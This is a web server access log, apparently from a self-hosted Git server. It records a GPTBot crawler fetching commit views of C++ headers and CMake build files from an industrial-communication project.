"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12957] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11451] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11447] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11844] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12530] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11448] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11447] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" +[17/Feb/2026:17:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 1053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:17:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 